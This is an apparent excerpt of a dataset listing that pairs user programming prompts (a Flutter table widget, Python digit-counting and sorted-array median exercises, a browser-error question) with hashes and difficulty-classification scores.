33,021 | replace ident spaces with "X" replace ident spaces with "X" replace ident spaces with "X" replace ident spaces with "X" replace ident spaces with "X" replace ident spaces with "X" replace ident spaces with "X": | f18b86e7aa634bea0a17a651908d11c7 | {
"intermediate": 0.357531875371933,
"beginner": 0.3059374690055847,
"expert": 0.3365305960178375
} |
33,022 | return Column(
children: [
Table(
border: TableBorder.symmetric(
inside: BorderSide(
color: UIColors.aluminium,
style: BorderStyle.solid,
width: 2.w),
),
children: [
TableRow(
... | 6929a441105f770a576e369a634aa5df | {
"intermediate": 0.2958751320838928,
"beginner": 0.46762049198150635,
"expert": 0.23650430142879486
} |
33,023 | answer this methodically on python "Imagine you took all the numbers between 0 and n and concatenated them together into a long string. How many digits are there between 0 and n? Write a function that can calculate this.
There are 0 digits between 0 and 1, there are 9 digits between 0 and 10 and there are 189 digits b... | 9abc060e9c88424e8e3c9b118d0a24bc | {
"intermediate": 0.3734670877456665,
"beginner": 0.24033521115779877,
"expert": 0.38619768619537354
} |
33,024 | answer this in python methodically:"Given two sorted arrays nums1 and nums2 of size m and n respectively, return the median of the two sorted arrays.
The overall run time complexity should be O(log (m+n)).
Example 1:
Input: nums1 = [1,3], nums2 = [2]
Output: 2.00000
Explanation: merged array = [1,2,3] and median ... | 871de1a49d7fbb5d8438e9b8a101550b | {
"intermediate": 0.3769930899143219,
"beginner": 0.22452779114246368,
"expert": 0.3984791040420532
} |
33,025 | . just got an another idea here. what if we look for an NS error in browser "transferred" returned and base overall sortage on if there's an NS error returned or timout ended? | 6d4c5facba382474c002834828d78f94 | {
"intermediate": 0.4466836154460907,
"beginner": 0.1715744435787201,
"expert": 0.3817419707775116
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.